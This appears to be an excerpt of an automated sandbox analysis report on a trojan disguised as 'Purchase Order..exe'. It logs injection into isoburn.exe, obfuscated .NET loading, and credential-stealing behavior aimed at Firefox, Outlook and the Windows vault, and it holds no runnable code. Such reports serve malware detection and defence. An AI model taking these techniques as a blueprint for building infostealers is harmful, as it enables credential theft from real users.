                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_048F2BA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_048F2BE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_048F2BF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2B60 NtClose,LdrInitializeThunk,6_2_048F2B60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F35C0 NtCreateMutant,LdrInitializeThunk,6_2_048F35C0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F39B0 NtGetContextThread,LdrInitializeThunk,6_2_048F39B0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2CC0 NtQueryVirtualMemory,6_2_048F2CC0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2CF0 NtOpenProcess,6_2_048F2CF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2C00 NtQueryInformationProcess,6_2_048F2C00
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2DB0 NtEnumerateKey,6_2_048F2DB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2D00 NtSetInformationFile,6_2_048F2D00
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2EA0 NtAdjustPrivilegesToken,6_2_048F2EA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2E30 NtWriteVirtualMemory,6_2_048F2E30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2F90 NtProtectVirtualMemory,6_2_048F2F90
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2FA0 NtQuerySection,6_2_048F2FA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2F60 NtCreateProcessEx,6_2_048F2F60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2AB0 NtWaitForSingleObject,6_2_048F2AB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F2B80 NtQueryInformationFile,6_2_048F2B80
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F3090 NtSetValueKey,6_2_048F3090
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F3010 NtOpenDirectoryObject,6_2_048F3010
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F3D10 NtOpenProcessToken,6_2_048F3D10
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_048F3D70 NtOpenThread,6_2_048F3D70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_007190A0 NtCreateFile,6_2_007190A0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_00719210 NtReadFile,6_2_00719210
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_00719300 NtDeleteFile,6_2_00719300
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_007193A0 NtClose,6_2_007193A0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_00719510 NtAllocateVirtualMemory,6_2_00719510
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0496F0CC6_2_0496F0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497F0E06_2_0497F0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049770E96_2_049770E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CB1B06_2_048CB1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048F516C6_2_048F516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0498B16B6_2_0498B16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048AF1726_2_048AF172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C52A06_2_048C52A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DB2C06_2_048DB2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049612ED6_2_049612ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0490739A6_2_0490739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497132D6_2_0497132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048AD34C6_2_048AD34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FCF26_2_0497FCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04939C326_2_04939C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DFDC06_2_048DFDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C3D406_2_048C3D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04971D5A6_2_04971D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04977D736_2_04977D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C9EB06_2_048C9EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C1F926_2_048C1F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FFB16_2_0497FFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04883FD26_2_04883FD2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04883FD56_2_04883FD5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FF096_2_0497FF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C38E06_2_048C38E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0492D8006_2_0492D800
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_049559106_2_04955910
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048C99506_2_048C9950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DB9506_2_048DB950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04905AA06_2_04905AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04961AA36_2_04961AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0495DAAC6_2_0495DAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0496DAC66_2_0496DAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04977A466_2_04977A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FA496_2_0497FA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04933A6C6_2_04933A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048DFB806_2_048DFB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04935BF06_2_04935BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048FDBF96_2_048FDBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0497FB766_2_0497FB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_00701C306_2_00701C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCAE86_2_006FCAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCAF06_2_006FCAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAD006_2_006FAD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FCD106_2_006FCD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAE456_2_006FAE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_006FAE506_2_006FAE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007052C06_2_007052C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_007034D06_2_007034D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0071B9E06_2_0071B9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E7706_2_0469E770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E2B46_2_0469E2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469E3D36_2_0469E3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0469D8386_2_0469D838
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04907E54 appears 102 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048F5130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0492EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0493F290 appears 105 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 048AB970 appears 280 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018A5130 appears 58 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018EF290 appears 105 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018DEA12 appears 86 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 018B7E54 appears 102 times
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: String function: 0185B970 appears 280 times
                Source: Purchase Order..exe, 00000000.00000002.1439121005.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1454658069.0000000007520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1440993765.0000000004059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1440435766.0000000003090000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order..exe
                Source: Purchase Order..exe, 00000000.00000002.1453763523.00000000059B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order..exe
                Source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Purchase Order..exe
                Source: Purchase Order..exe, 00000003.00000002.1835504450.000000000195D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order..exe
                Source: Purchase Order..exeBinary or memory string: OriginalFilenamehsSy.exe0 vs Purchase Order..exe
                Source: Purchase Order..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, bjs6Td2uGivbYQmp4T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, bjs6Td2uGivbYQmp4T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/5
                Source: C:\Users\user\Desktop\Purchase Order..exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order..exe.log
                Source: C:\Users\user\Desktop\Purchase Order..exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user\AppData\Local\Temp\l420377x
                Source: Purchase Order..exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Purchase Order..exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: isoburn.exe, 00000006.00000003.2020985352.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2020836634.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2660079922.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Purchase Order..exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Section loaded: dwrite.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Purchase Order..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\Purchase Order..exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Purchase Order..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Purchase Order..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order..exe, 00000003.00000002.1835092143.0000000001278000.00000004.00000020.00020000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000002.2660645689.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jfBrBcvTIMPfDU.exe, 00000005.00000000.1754034145.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000000.1907095632.0000000000C1E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order..exe, Purchase Order..exe, 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1837480994.00000000046CE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1835190405.0000000004515000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, eIsPgl0kii0Wl5mLVU.cs.Net Code: rc6JmZMnx7 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order..exe.59b0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.cs.Net Code: rc6JmZMnx7 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 0_2_0166EE60 push esp; iretd 0_2_0166EE61
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004148DC pushad ; retf 3_2_004148E4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00426AB3 push es; retf 3_2_00426B5B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00418ABC push ebx; ret 3_2_00418ABD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00413BE9 push 00000025h; iretd 3_2_00413BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00417C83 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00417D07 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00401DE9 pushad ; retf 3_2_00401E17
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00404E1D push 2A89E27Eh; ret 3_2_00404E25
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00415625 push ebp; retf 3_2_00415626
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00404F61 push ss; ret 3_2_00404F62
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0183225F pushad ; ret 3_2_018327F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018327FA pushad ; ret 3_2_018327F9
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018609AD push ecx; mov dword ptr [esp], ecx 3_2_018609B6
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0183283D push eax; iretd 3_2_01832858
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01831368 push eax; iretd 3_2_01831369
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01839939 push es; iretd 3_2_01839940
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A66BBB pushad ; retf 5_2_03A66BC3
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6B315 push 00000035h; iretd 5_2_03A6B320
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6B353 push ds; retf 5_2_03A6B356
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6CA00 push ebx; ret 5_2_03A6CA01
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A57240 push ss; ret 5_2_03A57241
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A67904 push ebp; retf 5_2_03A67905
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A570FC push 2A89E27Eh; ret 5_2_03A57104
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A69FE6 push edx; retf 5_2_03A69FA1
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A69F62 push edx; retf 5_2_03A69FA1
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A65EC8 push 00000025h; iretd 5_2_03A65ECF
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6CE29 push cs; retf 5_2_03A6CE2A
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A78D92 push es; retf 5_2_03A78E3A
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeCode function: 5_2_03A6AD9B push ebx; ret 5_2_03A6AD9C
                Source: Purchase Order..exeStatic PE information: section name: .text entropy: 7.816664771480419
                Source: 0.2.Purchase Order..exe.4126b48.2.raw.unpack, 0.2.Purchase Order..exe.7520000.4.raw.unpack (multiple .cs classes): High entropy of concatenated method names
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, eIsPgl0kii0Wl5mLVU.csHigh entropy of concatenated method names: 'DITbwvNCQU', 'ksnbfUTena', 'QLsbWNNRxn', 'uuWbOmONs1', 'PI4b1FBdG0', 'oqtblsVq4W', 'vyJbgvLvk2', 'ui2b0DxpUe', 'PfvbdnPOOG', 'CgTboCXKMP'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, X558NpPrClr92QrkFG.csHigh entropy of concatenated method names: 'Sy4e2BJkZa', 'sNRe5V2wbW', 'ak9esAKX3J', 'aJketkwyQN', 'oGseCGIMP3', 'QjVeDxt3NB', 'vZOe34jwJ7', 'mbDex0bMaM', 'OsMepCWlQG', 'kG7equBLKK'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, VAc4cYWfGPlGTTre2M.csHigh entropy of concatenated method names: 'Dispose', 'KMMS9KG7Lj', 'YZJGttbAN5', 'hgY7iAWn3e', 'DACShk1f8J', 'H7XSzXkqJ8', 'ProcessDialogKey', 'wvbGT15Cpq', 'vEDGSs8yel', 'm45GG8awSN'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, GiVnSZSJMqpoDE5vlVN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SaVc41xKSI', 'HMwcXXOs9l', 'wVucntXMTD', 'Kuycc2JSOl', 'vUPcEWMBvr', 'GtWcB2TjK9', 'naNcQBNjJH'
